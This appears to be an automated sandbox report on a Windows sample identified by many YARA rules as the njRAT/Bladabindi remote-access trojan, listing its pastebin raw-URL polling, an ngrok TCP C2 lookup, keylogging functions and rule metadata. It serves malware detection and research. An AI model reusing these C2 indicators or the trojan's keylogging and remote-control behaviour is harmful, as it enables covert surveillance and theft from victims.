Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157
Source: unknown	TCP traffic detected without corresponding DNS query: 40.68.123.157

Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGPufzLEGIjDTt_akc_527nJ4zoGCbAZn0AkDcVIV2VLuAM78mz4Tuc4onQdlIzVDE6yNOrZBZH0yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-04; NID=513=TDdb6B1qf0imS6sQ9UI386TSBmUeGbONEAs1g_SjFnFVZT8tlWjduo1BWv8tK_X2kdpw5DyqH6DyKssZClnoNAKybygsq-HKlTpEzxscqZJ_pjS1BKmEZAqlwshMLYfbeJHYWJdOjDcEir8XmubnkA88KvIUU07OLdpJjmvAUwk
Source: global traffic	HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGPufzLEGIjDqkokB_Yx903z9S8-TdyWhW8iPlrZBrgRiiMPzrxlLxgoQH634QKXADTY9t1vdNmMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-05-02-04; NID=513=TDdb6B1qf0imS6sQ9UI386TSBmUeGbONEAs1g_SjFnFVZT8tlWjduo1BWv8tK_X2kdpw5DyqH6DyKssZClnoNAKybygsq-HKlTpEzxscqZJ_pjS1BKmEZAqlwshMLYfbeJHYWJdOjDcEir8XmubnkA88KvIUU07OLdpJjmvAUwk
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hBoxWr7ezrOa1ze&MD=M6HZe6PE HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=hBoxWr7ezrOa1ze&MD=M6HZe6PE HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com
Source: global traffic	HTTP traffic detected: GET /raw/s4TipmJt HTTP/1.1Host: pastebin.com

Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: pastebin.com
Source: global traffic	DNS traffic detected: DNS query: 0.tcp.eu.ngrok.io

Source: G1lnGpOLK4.exe, 00000000.00000002.4072983013.00000000030A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://pastebin.com
Source: G1lnGpOLK4.exe, 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4072983013.00000000030A1000.00000004.00000800.00020000.00000000.sdmp, G1lnGpOLK4.exe, 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp	String found in binary or memory: https://pastebin.com/raw/s4TipmJt

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 49849 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49841 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49851
Source: unknown	Network traffic detected: HTTP traffic on port 49837 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49849
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49847
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49843
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49841
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49831 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49839
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49837
Source: unknown	Network traffic detected: HTTP traffic on port 49847 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49835
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49833
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49831
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 49839 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49817
Source: unknown	Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49813
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49827 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49851 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49809
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49805
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49803
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49801
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49809 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49843 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49835 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.118.8.139:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 40.68.123.157:443 -> 192.168.2.4:49767 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, kl.cs

.Net Code: VKCodeToUnicode

E-Banking Fraud

Yara detected Njrat

Source: Yara match	File source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: G1lnGpOLK4.exe PID: 2472, type: MEMORYSTR

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RevengeRAT malware Author: Florian Roth
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RevengeRAT malware Author: Florian Roth
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.G1lnGpOLK4.exe.1390000.1.unpack, type: UNPACKEDPE	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen
Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.4074957187.00000000130AD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RevengeRAT malware Author: Florian Roth
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects malware from disclosed CN malware set Author: Florian Roth
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects unknown malware sample with pastebin RAW URL Author: Florian Roth
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Identify njRat Author: Brian Wallace @botnet_hunter
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.4072762585.0000000001390000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects NjRAT / Bladabindi Author: ditekSHen

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Code function: 0_2_00007FFD9B8E000A	0_2_00007FFD9B8E000A
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Code function: 0_2_00007FFD9B8E0501	0_2_00007FFD9B8E0501
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Code function: 0_2_00007FFD9B8E2354	0_2_00007FFD9B8E2354
Source: C:\Users\user\Desktop\G1lnGpOLK4.exe	Code function: 0_2_00007FFD9B8E1EDA	0_2_00007FFD9B8E1EDA

Source: G1lnGpOLK4.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: RevengeRAT_Sep17 date = 2017-09-04, hash3 = fe00c4f9c8439eea50b44f817f760d8107f81e2dba7f383009fde508ff4b8967, hash2 = 7c271484c11795876972aabeb277c7b3035f896c9e860a852d69737df6e14213, hash1 = 2a86a4b2dcf1657bcb2922e70fc787aa9b66ec1c26dc2119f669bd2ce3f2e94a, author = Florian Roth, description = Detects RevengeRAT malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Unknown_Malware_Sample_Jul17_2 date = 2017-08-01, hash1 = 3530d480db082af1823a7eb236203aca24dc3685f08c301466909f0794508a52, author = Florian Roth, description = Detects unknown malware sample with pastebin RAW URL, reference = https://goo.gl/iqH8CK, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.G1lnGpOLK4.exe.1390000.1.raw.unpack, type: UNPACKEDPE	Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
